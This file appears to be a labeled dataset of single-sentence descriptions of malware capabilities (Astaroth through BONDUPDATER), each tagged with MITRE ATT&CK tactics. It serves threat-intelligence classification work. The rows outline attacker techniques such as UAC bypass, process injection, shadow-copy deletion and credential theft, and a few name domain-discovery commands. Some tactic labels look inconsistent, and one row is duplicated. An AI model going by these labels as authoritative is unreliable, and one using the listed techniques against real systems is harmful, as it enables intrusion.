Astaroth uses an external software known as NetPass to recover passwords.,['TA0006:Credential Access']
Astaroth has used malicious VBS e-mail attachments for execution.,['TA0002:Execution']
Astaroth spawns a CMD process to execute commands.,['TA0002:Execution']
Astaroth uses WMIC to execute payloads.,['TA0002:Execution']
Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain.,['TA0005:Defense Evasion']
AsyncRAT can use the `CheckRemoteDebuggerPresent` function to detect the presence of a debugger.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
AsyncRAT can be configured to use dynamic DNS.,['TA0011:Command and Control']
AsyncRAT can hide the execution of scheduled tasks using `ProcessWindowStyle.Hidden`.,['TA0005:Defense Evasion']
AsyncRAT has the ability to download files over SFTP.,['TA0011:Command and Control']
AsyncRAT can capture keystrokes on the victim’s machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
AsyncRAT has the ability to use OS APIs including `CheckRemoteDebuggerPresent`.,['TA0002:Execution']
AsyncRAT can examine running processes to determine if a debugger is present.,['TA0007:Discovery']
AsyncRAT can create a scheduled task to maintain persistence on system start-up.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
AsyncRAT has the ability to view the screen on compromised hosts.,['TA0009:Collection']
"AsyncRAT can identify strings such as Virtual, vmware, or VirtualBox to detect virtualized environments.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
AsyncRAT can check the disk size through the values obtained with `DeviceInfo.`,['TA0007:Discovery']
AsyncRAT can check if the current user of a compromised system is an administrator.,['TA0007:Discovery']
AsyncRAT can record screen content on targeted systems.,['TA0009:Collection']
Attor can obtain application window titles and then determines which windows to perform Screen Capture on.,['TA0007:Discovery']
Attor encrypts collected data with a custom implementation of Blowfish and RSA ciphers.,['TA0009:Collection']
Attor's Blowfish key is encrypted with a public RSA key.,['TA0011:Command and Control']
Attor performs the injection by attaching its code into the APC queue using NtQueueApcThread API.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Attor's has a plugin that is capable of recording audio using available input sound devices.,['TA0009:Collection']
Attor has automatically collected data about the compromised system.,['TA0009:Collection']
Attor has a file uploader plugin that automatically exfiltrates the collected data and log files to the C2 server.,['TA0010:Exfiltration']
Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.,['TA0009:Collection']
"Strings in Attor's components are encrypted with a XOR cipher, using a hardcoded key and the configuration data, log files and plugins are encrypted using a hybrid encryption scheme of Blowfish-OFB combined with RSA.",['TA0005:Defense Evasion']
Attor has exfiltrated data over the C2 channel.,['TA0010:Exfiltration']
Attor’s plugin deletes the collected files and log files after exfiltration.,['TA0005:Defense Evasion']
Attor has used FTP protocol for C2 communication.,['TA0011:Command and Control']
Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.,['TA0007:Discovery']
"Attor can set attributes of log files and directories to HIDDEN, SYSTEM, ARCHIVE, or a combination of those.",['TA0005:Defense Evasion']
"Attor can download additional plugins, updates and other files.",['TA0011:Command and Control']
One of Attor's plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.,"['TA0009:Collection', 'TA0006:Credential Access']"
Attor has staged collected data in a central upload directory prior to exfiltration.,['TA0009:Collection']
"Attor's dispatcher can establish persistence via adding a Registry key with a logon script HKEY_CURRENT_USER\Environment ""UserInitMprLogonScript"" .","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Attor's dispatcher disguises itself as a legitimate task .,['TA0005:Defense Evasion']
Attor's dispatcher can modify the Run registry key.,['TA0005:Defense Evasion']
Attor has used Tor for C2 communication.,['TA0011:Command and Control']
Attor's dispatcher has used CreateProcessW API for execution.,['TA0002:Execution']
"Attor has a plugin that collects information about inserted storage devices, modems, and phone devices.",['TA0007:Discovery']
Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Attor has opened the registry and performed query searches.,['TA0007:Discovery']
Attor's installer plugin can schedule rundll32.exe to load the dispatcher.,['TA0005:Defense Evasion']
Attor's installer plugin can schedule a new task that loads the dispatcher on boot/logon.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Attor's has a plugin that captures screenshots of the target applications.,['TA0009:Collection']
Attor's dispatcher can be executed as a service.,['TA0002:Execution']
Attor's dispatcher can execute additional plugins by loading the respective DLLs.,['TA0002:Execution']
Attor has encrypted data symmetrically using a randomly generated Blowfish key which is encrypted with a public RSA key.,['TA0011:Command and Control']
"Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Attor monitors the free disk space on the system.,['TA0007:Discovery']
Attor has manipulated the time of last access to files and registry keys after they have been created or modified.,['TA0005:Defense Evasion']
Attor's dispatcher can establish persistence by registering a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"AuTo Stealer can collect data such as PowerPoint files, Word documents, Excel files, PDF files, text files, database files, and image files from an infected machine.",['TA0009:Collection']
AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.,['TA0010:Exfiltration']
AuTo Stealer can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.,['TA0009:Collection']
AuTo Stealer can use TCP to communicate with command and control servers.,['TA0011:Command and Control']
"AuTo Stealer can place malicious executables in a victim's AutoRun registry key or StartUp directory, depending on the AV product installed, to maintain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AuTo Stealer has the ability to collect information about installed AV products from an infected host.,['TA0007:Discovery']
AuTo Stealer has the ability to collect the hostname and OS information from an infected host.,['TA0007:Discovery']
AuTo Stealer has the ability to collect the username from an infected host.,['TA0007:Discovery']
AuTo Stealer can use HTTP to communicate with its C2 servers.,['TA0011:Command and Control']
AuTo Stealer can use `cmd.exe` to execute a created batch file.,['TA0002:Execution']
AuditCred uses XOR and RC4 to perform decryption on the code functions.,['TA0005:Defense Evasion']
AuditCred encrypts the configuration.,['TA0005:Defense Evasion']
AuditCred can delete files from the system.,['TA0005:Defense Evasion']
AuditCred can search through folders and files on the system.,['TA0007:Discovery']
AuditCred can download files and additional malware.,['TA0011:Command and Control']
AuditCred can inject code from files to other running processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
AuditCred can utilize proxy for communications.,['TA0011:Command and Control']
AuditCred can open a reverse shell on the system to execute commands.,['TA0002:Execution']
AuditCred is installed as a new service on the system.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AutoIt backdoor attempts to escalate privileges by bypassing User Access Control.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"AutoIt backdoor is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.",['TA0007:Discovery']
AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.,['TA0002:Execution']
AutoIt backdoor has sent a C2 response that was base64-encoded.,['TA0011:Command and Control']
Avaddon bypasses UAC using the CMSTPLUA COM interface.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes.,['TA0040:Impact']
Avaddon has decrypted encrypted strings.,['TA0005:Defense Evasion']
Avaddon looks for and attempts to stop anti-malware solutions.,['TA0005:Defense Evasion']
Avaddon has searched for specific files prior to encryption.,['TA0007:Discovery']
Avaddon deletes backups and shadow copies using native system tools.,['TA0040:Impact']
Avaddon has been executed through a malicious JScript downloader.,['TA0002:Execution']
Avaddon modifies several registry keys for persistence and UAC bypass.,['TA0005:Defense Evasion']
Avaddon has used the Windows Crypto API to generate an AES key.,['TA0002:Execution']
Avaddon has enumerated shared folders and mapped volumes.,['TA0007:Discovery']
Avaddon has used encrypted strings.,['TA0005:Defense Evasion']
Avaddon has collected information about running processes.,['TA0007:Discovery']
Avaddon uses registry run keys for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Avaddon looks for and attempts to stop database processes.,['TA0040:Impact']
Avaddon checks for specific keyboard layouts and OS languages to avoid targeting Commonwealth of Independent States entities.,['TA0007:Discovery']
Avaddon can collect the external IP address of the victim.,['TA0007:Discovery']
Avaddon uses wmic.exe to delete shadow copies.,['TA0002:Execution']
Avenger has the ability to decrypt files downloaded from C2.,['TA0005:Defense Evasion']
Avenger has the ability to XOR encrypt files to be sent to C2.,['TA0005:Defense Evasion']
Avenger has the ability to browse files in directories such as Program Files and the Desktop.,['TA0007:Discovery']
Avenger has the ability to download files from C2 to a compromised host.,['TA0011:Command and Control']
Avenger has the ability to use Tasklist to identify running processes.,['TA0007:Discovery']
Avenger has the ability to inject shellcode into svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Avenger has the ability to identify installed anti-virus products on a compromised host.,['TA0007:Discovery']
Avenger can extract backdoor malware from downloaded images.,['TA0005:Defense Evasion']
Avenger has the ability to identify the host volume ID and the OS architecture on a compromised host.,['TA0007:Discovery']
Avenger can identify the domain of the compromised host.,['TA0007:Discovery']
Avenger has the ability to use HTTP in communication with C2.,['TA0011:Command and Control']
"AvosLocker has encrypted files and network resources using AES-256 and added an `.avos`, `.avos2`, or `.AvosLinux` extension to filenames.",['TA0040:Impact']
AvosLocker has deobfuscated XOR-encoded strings.,['TA0005:Defense Evasion']
AvosLocker has used obfuscated API calls that are retrieved by their checksums.,['TA0005:Defense Evasion']
AvosLocker has searched for files and directories on a compromised network.,['TA0007:Discovery']
AvosLocker has hidden its console window by using the `ShowWindow` API function.,['TA0005:Defense Evasion']
AvosLocker has been disguised as a .jpg file.,['TA0005:Defense Evasion']
"AvosLocker has used a variety of Windows API calls, including `NtCurrentPeb` and `GetLogicalDrives`.",['TA0002:Execution']
AvosLocker has enumerated shared drives on a compromised network.,['TA0007:Discovery']
AvosLocker has used XOR-encoded strings.,['TA0005:Defense Evasion']
AvosLocker has discovered system processes by calling `RmGetList`.,['TA0007:Discovery']
AvosLocker has been executed via the `RunOnce` Registry key to run itself on safe mode.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
AvosLocker can restart a compromised machine in safe mode.,['TA0005:Defense Evasion']
AvosLocker has terminated specific processes before encryption.,['TA0040:Impact']
AvosLocker’s Linux variant has terminated ESXi virtual machines.,['TA0040:Impact']
AvosLocker has checked the system time before and after encryption.,['TA0007:Discovery']
Azorult can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam.",['TA0006:Credential Access']
Azorult can steal credentials from the victim's browser.,['TA0006:Credential Access']
Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address.,['TA0005:Defense Evasion']
Azorult can delete files from victim machines.,['TA0005:Defense Evasion']
Azorult can recursively search for files in folders and collects files from the desktop with certain extensions.,['TA0007:Discovery']
Azorult can download and execute additional files. Azorult has also downloaded a ransomware payload called Hermes.,['TA0011:Command and Control']
Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot.,['TA0007:Discovery']
"Azorult can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Azorult can check for installed software on the system under the Registry key Software\Microsoft\Windows\CurrentVersion\Uninstall.,['TA0007:Discovery']
Azorult can capture screenshots of the victim’s machines.,['TA0009:Collection']
Azorult can encrypt C2 traffic using XOR.,['TA0011:Command and Control']
"Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.",['TA0007:Discovery']
Azorult can collect host IP information from the victim’s machine.,['TA0007:Discovery']
Azorult can collect the username from the victim’s machine.,['TA0007:Discovery']
Azorult can collect the time zone information from the system.,['TA0007:Discovery']
"The ""ZR"" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.",['TA0005:Defense Evasion']
Adversaries can direct BACKSPACE to upload files to the C2 Server.,['TA0010:Exfiltration']
BACKSPACE allows adversaries to search for files.,['TA0007:Discovery']
"The ""ZJ"" variant of BACKSPACE allows ""ZJ link"" infections with Internet access to relay traffic from ""ZJ listen"" to a command server.",['TA0011:Command and Control']
"BACKSPACE is capable of deleting Registry keys, sub-keys, and values on a victim system.",['TA0005:Defense Evasion']
"BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs ""louder"" interactions with the malware.",['TA0011:Command and Control']
Newer variants of BACKSPACE will encode C2 communications with a custom system.,['TA0011:Command and Control']
BACKSPACE may collect information about running processes.,['TA0007:Discovery']
BACKSPACE is capable of enumerating and making modifications to an infected system's Registry.,['TA0007:Discovery']
BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During its initial execution, BACKSPACE extracts operating system information from the infected host.",['TA0007:Discovery']
BACKSPACE uses HTTP as a transport to communicate with its command server.,['TA0011:Command and Control']
"Adversaries can direct BACKSPACE to execute from the command line on infected hosts, or have BACKSPACE create a reverse shell.",['TA0002:Execution']
BADCALL disables the Windows firewall before binding to a port.,['TA0005:Defense Evasion']
BADCALL modifies the firewall Registry key SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileGloballyOpenPorts\\List.,['TA0005:Defense Evasion']
BADCALL communicates on ports 443 and 8000 with a FakeTLS method.,['TA0011:Command and Control']
BADCALL uses a FakeTLS method during C2.,['TA0011:Command and Control']
BADCALL functions as a proxy server between the victim and C2 server.,['TA0011:Command and Control']
BADCALL encrypts C2 traffic using an XOR/ADD cipher.,['TA0011:Command and Control']
BADCALL collects the computer name and host name on the compromised system.,['TA0007:Discovery']
BADCALL collects the network adapter information.,['TA0007:Discovery']
BADFLICK has compressed data using the aPLib compression library.,['TA0009:Collection']
BADFLICK has uploaded files from victims' machines.,['TA0009:Collection']
BADFLICK can decode shellcode using a custom rotating XOR cipher.,['TA0005:Defense Evasion']
BADFLICK has searched for files on the infected host.,['TA0007:Discovery']
BADFLICK has download files from its C2 server.,['TA0011:Command and Control']
BADFLICK has relied upon users clicking on a malicious attachment delivered through spearphishing.,['TA0002:Execution']
BADFLICK has been distributed via spearphishing campaigns containing malicious Microsoft Word documents.,['TA0001:Initial Access']
"BADFLICK has captured victim computer name, memory space, and CPU details.",['TA0007:Discovery']
BADFLICK has captured victim IP address details.,['TA0007:Discovery']
BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
BADHATCH can beacon to a hardcoded C2 IP address using TLS encryption every 5 minutes.,['TA0011:Command and Control']
BADHATCH can inject itself into a new `svchost.exe -k netsvcs` process using the asynchronous procedure call queue.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BADHATCH can utilize the CMSTPLUA COM interface and the SilentCleanup task to bypass UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BADHATCH malicious PowerShell commands can be encoded with base64.,['TA0005:Defense Evasion']
"BADHATCH can use `net.exe group ""domain admins"" /domain` to identify Domain Administrators.",['TA0007:Discovery']
BADHATCH can use `nltest.exe /domain_trusts` to discover domain trust relationships on a compromised machine.,['TA0007:Discovery']
BADHATCH has the ability to execute a malicious DLL by injecting into `explorer.exe` on a compromised machine.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BADHATCH has an embedded second stage DLL payload within the first stage of the malware.,['TA0005:Defense Evasion']
BADHATCH can be compressed with the ApLib algorithm.,['TA0005:Defense Evasion']
BADHATCH can exfiltrate data over the C2 channel.,['TA0010:Exfiltration']
BADHATCH has the ability to delete PowerShell scripts from a compromised machine.,['TA0005:Defense Evasion']
BADHATCH can emulate an FTP server to connect to actor-controlled C2 servers.,['TA0011:Command and Control']
BADHATCH has the ability to load a second stage malicious DLL file onto a compromised machine.,['TA0011:Command and Control']
"BADHATCH can utilize Native API functions such as, `ToolHelp32` and `Rt1AdjustPrivilege` to enable `SeDebugPrivilege` on a compromised machine.",['TA0002:Execution']
BADHATCH can check for open ports on a computer by establishing a TCP connection.,['TA0007:Discovery']
BADHATCH can check a user's access to the C$ share on a compromised machine.,['TA0007:Discovery']
BADHATCH can perform pass the hash on compromised machines with x64 versions.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
BADHATCH can utilize `powershell.exe` to execute commands on a compromised host.,['TA0002:Execution']
BADHATCH can retrieve a list of running processes from a compromised machine.,['TA0007:Discovery']
BADHATCH can inject itself into an existing explorer.exe process by using `RtlCreateUserThread`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BADHATCH can use SOCKS4 and SOCKS5 proxies to connect to actor-controlled C2 servers. BADHATCH can also emulate a reverse proxy on a compromised machine to connect with actor-controlled C2 servers.,['TA0011:Command and Control']
BADHATCH can copy a large byte array of 64-bit shellcode into process memory and execute it with a call to `CreateThread`.,['TA0005:Defense Evasion']
"BADHATCH can use a PowerShell object such as, `System.Net.NetworkInformation.Ping` to ping a computer.",['TA0007:Discovery']
BADHATCH can use `schtasks.exe` to gain persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BADHATCH can take screenshots and send them to an actor-controlled C2 server.,['TA0009:Collection']
"BADHATCH can obtain current system information from a compromised machine such as the `SHELL PID`, `PSVERSION`, `HOSTNAME`, `LOGONSERVER`, `LASTBOOTUP`, drive information, OS type/version, bitness, and hostname.",['TA0007:Discovery']
BADHATCH can execute `netstat.exe -f` on a compromised machine.,['TA0007:Discovery']
BADHATCH can obtain logged user information from a compromised machine and can execute the command `whoami.exe`.,['TA0007:Discovery']
BADHATCH can obtain the `DATETIME` and `UPTIME` from a compromised machine.,['TA0007:Discovery']
BADHATCH can impersonate a `lsass.exe` or `vmtoolsd.exe` token.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BADHATCH can use HTTP and HTTPS over port 443 to communicate with actor-controlled C2 servers.,['TA0011:Command and Control']
"BADHATCH can be utilized to abuse `sslip.io`, a free IP to domain mapping service, as part of actor-controlled C2 channels.",['TA0011:Command and Control']
BADHATCH can use `cmd.exe` to execute commands on a compromised host.,['TA0002:Execution']
"BADHATCH can utilize WMI to collect system information, create new processes, and run malicious PowerShell scripts on a compromised machine.",['TA0002:Execution']
BADHATCH can use WMI event subscriptions for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory.,['TA0009:Collection']
"BADNEWS can use multiple C2 channels, including RSS feeds, Github, forums, and blogs.",['TA0011:Command and Control']
BADNEWS typically loads its DLL file into a legitimate signed Java or VMware executable.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"After encrypting C2 data, BADNEWS converts it into a hexadecimal representation and then encodes it into base64.",['TA0011:Command and Control']
"When it first starts, BADNEWS crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.",['TA0009:Collection']
"When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.",['TA0009:Collection']
BADNEWS copies files with certain extensions from USB devices to a predefined directory.,['TA0009:Collection']
BADNEWS collects C2 information via a dead drop resolver.,['TA0011:Command and Control']
"BADNEWS identifies files with certain extensions from USB devices, then copies them to a predefined directory.",['TA0007:Discovery']
"BADNEWS is capable of downloading additional files through C2 channels, including a new version of itself.",['TA0011:Command and Control']
BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.,['TA0005:Defense Evasion']
"When it first starts, BADNEWS spawns a new thread to log keystrokes.","['TA0009:Collection', 'TA0006:Credential Access']"
BADNEWS copies documents under 15MB found on the victim system to is the user's %temp%\SMB\ folder. It also copies files from USB devices to a predefined directory.,['TA0009:Collection']
BADNEWS attempts to hide its payloads using legitimate filenames.,['TA0005:Defense Evasion']
BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.,['TA0002:Execution']
"BADNEWS checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.",['TA0007:Discovery']
BADNEWS has a command to download an .exe and use process hollowing to inject it into a new process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BADNEWS installs a registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BADNEWS creates a scheduled task to establish by executing a malicious payload every subsequent minute.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BADNEWS has a command to take a screenshot and send it to the C2 server.,['TA0009:Collection']
BADNEWS encodes C2 traffic with base64.,['TA0011:Command and Control']
BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23.,['TA0011:Command and Control']
BADNEWS establishes a backdoor over HTTP.,['TA0011:Command and Control']
BADNEWS is capable of executing commands via cmd.exe.,['TA0002:Execution']
BBK has the ability to decrypt AES encrypted payloads.,['TA0005:Defense Evasion']
BBK has the ability to download files from C2 to the infected host.,['TA0011:Command and Control']
BBK has the ability to use the CreatePipe API to add a sub-process for execution via cmd.,['TA0002:Execution']
BBK has the ability to inject shellcode into svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BBK can extract a malicious Portable Executable from a photo.,['TA0005:Defense Evasion']
BBK has the ability to use HTTP in communications with C2.,['TA0011:Command and Control']
BBK has the ability to use cmd to run a Portable Executable on the compromised host.,['TA0002:Execution']
BBSRAT can compress data with ZLIB prior to sending it back to the C2 server.,['TA0009:Collection']
BBSRAT has been seen persisting via COM hijacking through replacement of the COM object for MruPidlList {42aedc87-2188-41fd-b9a3-0c966feabec1} or Microsoft WBEM New Event Subsystem {F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} depending on the system's CPU architecture.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"DLL side-loading has been used to execute BBSRAT through a legitimate Citrix executable, ssonsvr.exe. The Citrix executable was dropped along with BBSRAT by the dropper.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
BBSRAT uses Expand to decompress a CAB file into executable content.,['TA0005:Defense Evasion']
BBSRAT can delete files and directories.,['TA0005:Defense Evasion']
BBSRAT can list file and directory information.,['TA0007:Discovery']
BBSRAT can list running processes.,['TA0007:Discovery']
BBSRAT has been seen loaded into msiexec.exe through process hollowing to hide its execution.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
BBSRAT has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the Registry Run key location HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssonsvr.exe.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"BBSRAT can start, stop, or delete services.",['TA0002:Execution']
BBSRAT uses a custom encryption algorithm on data sent back to the C2 server over HTTP.,['TA0011:Command and Control']
BBSRAT can query service configuration information.,['TA0007:Discovery']
BBSRAT uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.,['TA0011:Command and Control']
BBSRAT can modify service configurations.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
BFG Agonizer uses DLL unhooking to remove user mode inline hooks that security solutions often implement. BFG Agonizer also uses IAT unhooking to remove user-mode IAT hooks that security solutions also use.,['TA0003:Persistence']
BFG Agonizer retrieves a device handle to \\\\.\\PhysicalDrive0 to wipe the boot sector of a given disk.,['TA0040:Impact']
BFG Agonizer wipes the boot sector of infected machines to inhibit system recovery.,['TA0040:Impact']
"BFG Agonizer uses elevated privileges to call NtRaiseHardError to induce a ""blue screen of death"" on infected systems, causing a system crash. Once shut down, the system is no longer bootable.",['TA0040:Impact']
BISCUIT uses SSL for encrypting C2 communications.,['TA0011:Command and Control']
BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server.,['TA0011:Command and Control']
BISCUIT has a command to download a file from the C2 server.,['TA0011:Command and Control']
BISCUIT can capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
BISCUIT has a command to enumerate running processes and identify their owners.,['TA0007:Discovery']
BISCUIT has a command to periodically take screenshots of the system.,['TA0009:Collection']
"BISCUIT has a command to collect the processor type, operation system, computer name, and whether the system is a laptop or PC.",['TA0007:Discovery']
BISCUIT has a command to gather the username from the system.,['TA0007:Discovery']
BISCUIT has a command to collect the system `UPTIME`.,['TA0007:Discovery']
BISCUIT has a command to launch a command shell on the system.,['TA0002:Execution']
BITSAdmin can be used to create BITS Jobs to launch a malicious process.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.,['TA0010:Exfiltration']
BITSAdmin can be used to create BITS Jobs to upload and/or download files.,['TA0011:Command and Control']
BITSAdmin can be used to create BITS Jobs to upload and/or download files from SMB file servers.,['TA0008:Lateral Movement']
BLACKCOFFEE has also obfuscated its C2 traffic as normal traffic to sites such as Github.,['TA0011:Command and Control']
BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server.,['TA0011:Command and Control']
BLACKCOFFEE has the capability to delete files.,['TA0005:Defense Evasion']
BLACKCOFFEE has the capability to enumerate files.,['TA0007:Discovery']
"BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims’ machines.",['TA0011:Command and Control']
BLACKCOFFEE has the capability to discover processes.,['TA0007:Discovery']
BLACKCOFFEE has the capability to create a reverse shell.,['TA0002:Execution']
BLINDINGCAN has been signed with code-signing certificates such as CodeRipper.,['TA0005:Defense Evasion']
BLINDINGCAN has uploaded files from victim machines.,['TA0009:Collection']
BLINDINGCAN has used AES and XOR to decrypt its DLLs.,['TA0005:Defense Evasion']
BLINDINGCAN has obfuscated code using Base64 encoding.,['TA0005:Defense Evasion']
BLINDINGCAN has sent user and system information to a C2 server via HTTP POST requests.,['TA0010:Exfiltration']
BLINDINGCAN has deleted itself and associated artifacts from victim machines.,['TA0005:Defense Evasion']
"BLINDINGCAN can search, read, write, move, and execute files.",['TA0007:Discovery']
BLINDINGCAN has downloaded files to a victim machine.,['TA0011:Command and Control']
BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents.,['TA0002:Execution']
"BLINDINGCAN has attempted to hide its payload by using legitimate file names such as ""iconcache.db"".",['TA0005:Defense Evasion']
BLINDINGCAN has used Rundll32 to load a malicious DLL.,['TA0005:Defense Evasion']
BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine.,['TA0002:Execution']
BLINDINGCAN has been packed with the UPX packer.,['TA0005:Defense Evasion']
BLINDINGCAN has been delivered by phishing emails containing malicious Microsoft Office documents.,['TA0001:Initial Access']
BLINDINGCAN has encoded its C2 traffic with Base64.,['TA0011:Command and Control']
BLINDINGCAN has encrypted its C2 traffic with RC4.,['TA0011:Command and Control']
"BLINDINGCAN has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.",['TA0007:Discovery']
BLINDINGCAN has collected the victim machine's local IP address information and MAC address.,['TA0007:Discovery']
BLINDINGCAN has modified file and directory timestamps.,['TA0005:Defense Evasion']
BLINDINGCAN has used HTTPS over port 443 for command and control.,['TA0011:Command and Control']
BLINDINGCAN has executed commands via cmd.exe.,['TA0002:Execution']
BLUELIGHT can zip files before exfiltration.,['TA0009:Collection']
BLUELIGHT has encoded data into a binary blob using XOR.,['TA0009:Collection']
BLUELIGHT can use different cloud providers for its C2.,['TA0011:Command and Control']
"BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale.",['TA0006:Credential Access']
BLUELIGHT has a XOR-encoded payload.,['TA0005:Defense Evasion']
BLUELIGHT has exfiltrated data over its C2 channel.,['TA0010:Exfiltration']
BLUELIGHT can uninstall itself.,['TA0005:Defense Evasion']
BLUELIGHT can enumerate files and collect associated metadata.,['TA0007:Discovery']
BLUELIGHT can download additional files onto the host.,['TA0011:Command and Control']
BLUELIGHT can collect process filenames and SID authority level.,['TA0007:Discovery']
"BLUELIGHT has captured a screenshot of the display every 30 seconds for the first 5 minutes after initiating a C2 loop, and then once every five minutes thereafter.",['TA0009:Collection']
BLUELIGHT can collect a list of anti-virus products installed on a machine.,['TA0007:Discovery']
"BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.",['TA0006:Credential Access']
BLUELIGHT can check to see if the infected machine has VM tools running.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
BLUELIGHT has collected the computer name and OS version from victim machines.,['TA0007:Discovery']
BLUELIGHT can collect IP information from the victim’s machine.,['TA0007:Discovery']
BLUELIGHT can collect the username on a compromised host.,['TA0007:Discovery']
BLUELIGHT can collect the local time on a compromised host.,['TA0007:Discovery']
BLUELIGHT can use HTTP/S for C2 using the Microsoft Graph API.,['TA0011:Command and Control']
BONDUPDATER can use DNS and TXT records within its DNS tunneling protocol for command and control.,['TA0011:Command and Control']
BONDUPDATER uses a DGA to communicate with command and control servers.,['TA0011:Command and Control']
BONDUPDATER uses -windowstyle hidden to conceal a PowerShell window that downloads a payload.,['TA0005:Defense Evasion']
BONDUPDATER can download or upload files from its C2 server.,['TA0011:Command and Control']
BONDUPDATER is written in PowerShell.,['TA0002:Execution']
